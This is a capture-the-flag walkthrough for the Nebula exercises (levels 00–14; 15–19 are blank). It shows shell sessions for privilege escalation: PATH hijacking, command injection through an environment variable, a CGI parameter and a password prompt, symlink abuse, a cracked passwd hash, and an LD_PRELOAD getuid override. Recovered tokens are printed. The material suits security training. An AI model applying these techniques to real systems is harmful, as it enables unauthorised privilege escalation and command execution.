Solutions
Level 00
```
level00@nebula:~$ find / -perm -4000 -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
```
Level 01
```
level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/a
level01@nebula:/home/flag01$ echo -e '#!/bin/bash\n/tmp/a' > /tmp/echo
level01@nebula:/home/flag01$ chmod +x /tmp/echo
level01@nebula:/home/flag01$ ./flag01
flag01@nebula:/home/flag01$ getflag
You have successfully executed getflag on a target account
flag01@nebula:/home/flag01$
```
Level 02
```
level02@nebula:/home/flag02$ export USER='-e "#!/bin/bash\n/bin/bash" > /tmp/level02;chmod +x /tmp/level02;/tmp/level02'
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo -e "#!/bin/bash\n/bin/bash" > /tmp/level02;chmod +x /tmp/level02;/tmp/level02 is cool")
flag02@nebula:/home/flag02$ getflag
You have successfully executed getflag on a target account
```
Level 03
```
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/aa" > ./aa
level03@nebula:/home/flag03/writable.d$ cat /tmp/aa
cat: /tmp/aa: No such file or directory
level03@nebula:/home/flag03/writable.d$ cat /tmp/aa
You have successfully executed getflag on a target account
```
Level 04
```
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
```
Level 06
```
level06@nebula:/home/flag06$ cat /etc/passwd

zero@ubuntu:~/Desktop/tool/john$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > ./flag06
zero@ubuntu:~/Desktop/tool/john/run$ ./john ../flag06
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 64/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (flag06)
1g 0:00:00:00 100% 2/3 100.0g/s 68900p/s 68900c/s 68900C/s 123456..magic
Use the "--show" option to display all of the cracked passwords reliably
Session completed

level06@nebula:/home/flag06$ su flag06
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
```
Level 07
```
level07@nebula:/home/flag07$ ./index.cgi Host=localhost;ls
Content-type: text/html

PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=0.014 ms
64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=0.023 ms
64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=0.021 ms
....
index.cgi thttpd.conf

level07@nebula:/home/flag07$ wget http://127.0.0.1:7007/index.cgi?Host=%3bgetflag
--2015-11-25 05:04:04-- http://127.0.0.1:7007/index.cgi?Host=%3bgetflag
Connecting to 127.0.0.1:7007... failed: Connection refused.
```

Hmm.... just pass....
Level 08
- just open the pcap file with Wireshark ; but just be careful about 0x7f (means backspace)
- backdoor bs bs bs 00rm8 bs ate -> backd00rmate

```
level08@nebula:/home/flag08$ su flag08
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
```
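The backspace handling noted above, as an added example that is not part of the original post: it replays captured keystroke bytes the way a terminal's line editing would, so the effective input can be read without counting erase keys by hand. The function names and the sample byte string are assumptions, constructed from the sequence written in the note.

```python
# Added example: rebuild typed input from raw keystroke bytes in a capture.
ERASE = {0x7F, 0x08}   # DEL and BS: both erase one character on a tty
ENTER = {0x0D, 0x0A}   # CR / LF end the line being typed


def replay(stream: bytes) -> list:
    """Return the lines left after applying erase keys to the stream."""
    lines, buf = [], []
    for b in stream:
        if b in ERASE:
            if buf:                  # erase on an empty line is a no-op
                buf.pop()
        elif b in ENTER:
            if buf:                  # CR followed by LF yields one line
                lines.append("".join(buf))
                buf = []
        elif 0x20 <= b < 0x7F:       # keep printable ASCII only
            buf.append(chr(b))
        # any other control byte (e.g. NUL padding) is ignored
    if buf:
        lines.append("".join(buf))   # unterminated trailing input
    return lines


def annotate(stream: bytes) -> str:
    """Render the raw stream with erase and enter keys made visible."""
    out = []
    for b in stream:
        if b in ERASE:
            out.append("<bs>")
        elif b in ENTER:
            out.append("<cr>")
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append("<%02x>" % b)
    return "".join(out)


# Constructed sample: the keystroke sequence described in the Level 08 note.
SAMPLE = b"backdoor\x7f\x7f\x7f00rm8\x7fate\r"

if __name__ == "__main__":
    print(annotate(SAMPLE))
    print(replay(SAMPLE))
```
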
Level 09
- function spam isn't used
- argv[2] is used nowhere
 ; $use_me needs to be used

Hmm.... I have no idea ... haha
Level 10
- simply my nc doesn't work....
 ; how to solve : make a symbolic file with the -f option in /tmp, and make another symbolic file to it
 ; run any program which can receive a packet from it like nc, run flag10
 ; and you can get the token

P.S. But I found a strange file in the home folder named 'x', so I opened it and the answer is there!
Level 11
; At first, I tried LD_PRELOAD, but it didn't work because I didn't consider the encryption part

; Decryption Code

```python
#!/usr/bin/env python
# Python 2 script (print statement), as run on the Nebula VM.

string = "/bin/getflag;"
enc_string = ""
key = 0

for i in string:
    # XOR each byte with the low byte of the running key
    char = ord(i) ^ key & 0xff
    enc_string += chr(char)
    # the key is decremented by the plaintext byte
    key -= ord(i) & 0xff
# pad the body with "A" so it is exactly 1024 bytes long
print "Content-Length: 1024\n" + enc_string + "A" * (1024 - len(enc_string))
```
Level 12
```
level12@nebula:/home/flag12$ nc localhost 50001
Password: ;/bin/getflag > /tmp/fff;echo 1
Better luck next time
level12@nebula:/home/flag12$ cat /tmp/fff
You have successfully executed getflag on a target account
```
Level 13
; a.so source

```c
#include <sys/types.h>

uid_t getuid(void) {
    return 1000;
}
```

```
level13@nebula:~$ cp ../flag13/flag13 ./
level13@nebula:~$ LD_PRELOAD=./a.so ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
level13@nebula:~$ su flag13
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
```
Level 14
```
level14@nebula:/home/flag14$ ./flag14 -e
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrstuvwxyz{|}'^C
level14@nebula:/home/flag14$ ./flag14 -e
bbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bcdefghijklmnopqrstuvwxyz{|}~'^C
level14@nebula:/home/flag14$ ./flag14 -e
abced
acehh^C
```

; we can discover the algorithm without disassembling flag14
algorithm : chr(input_data[i] + i) -> enc_data[i]

; Decryption Source

```python
#!/usr/bin/env python
# Python 2 script (print statement), as run on the Nebula VM.
import sys

flag = ""
cnt = 0

with open("/home/flag14/token", "r") as i:
    # drop the last character of the file, then undo the per-position shift
    for j in i.read()[:-1]:
        flag += chr(ord(j) - cnt)
        cnt += 1
print flag
```

```
level14@nebula:/home/flag14$ python /tmp/ab.py
8457c118-887c-4e40-a5a6-33a25353165
level14@nebula:/home/flag14$ su flag14
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
```
Level 15
Level 16
Level 17
Level 18
Level 19